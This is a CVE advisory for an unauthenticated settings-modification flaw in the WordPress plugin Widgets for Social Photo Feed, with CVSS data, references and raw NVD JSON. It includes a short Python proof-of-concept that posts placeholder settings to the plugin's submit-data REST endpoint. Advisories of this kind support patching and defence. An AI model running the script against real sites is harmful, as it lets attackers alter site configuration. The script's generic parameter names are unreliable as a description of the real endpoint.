CVE-2025-14726

Description

The Widgets for Social Photo Feed plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the '/trustindex_feed_hook_instagram/troubleshooting' and '/trustindex_feed_hook_instagram/submit-data' REST API endpoints in all versions up to, and including, 1.8. This makes it possible for unauthenticated attackers to access and update plugin settings.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

WordPress Widgets for Social Photo Feed <= 1.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable endpoint
# This endpoint is missing capability checks
target_url = "http://example.com/wp-json/trustindex_feed_hook_instagram/submit-data"

# Payload to modify plugin settings arbitrarily
payload = {
    "option_name": "some_plugin_option",
    "option_value": "malicious_value"
}

try:
    # Send unauthenticated POST request
    response = requests.post(target_url, json=payload, timeout=10)

    # Check if the request was successful (HTTP 200)
    if response.status_code == 200:
        print("[+] Successfully exploited the vulnerability!")
        print("[+] Response from server:", response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except requests.exceptions.RequestException as e:
    print(f"[-] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14726
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14726
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14726/
[4] VulDB https://vuldb.com/cve/CVE-2025-14726
[5] https://plugins.trac.wordpress.org/changeset/3513612/social-photo-feed-widget
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/ab15fa8b-4072-435a-8a1c-ca6fd964a260?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14726", "sourceIdentifier": "[email protected]", "published": "2026-05-02T05:16:00.093", "lastModified": "2026-05-05T19:17:22.860", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Widgets for Social Photo Feed plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the '/trustindex_feed_hook_instagram/troubleshooting' and '/trustindex_feed_hook_instagram/submit-data' REST API endpoints in all versions up to, and including, 1.8. This makes it possible for unauthenticated attackers to access and update plugin settings."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3513612/social-photo-feed-widget", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ab15fa8b-4072-435a-8a1c-ca6fd964a260?source=cve", "source": "[email protected]"}]}}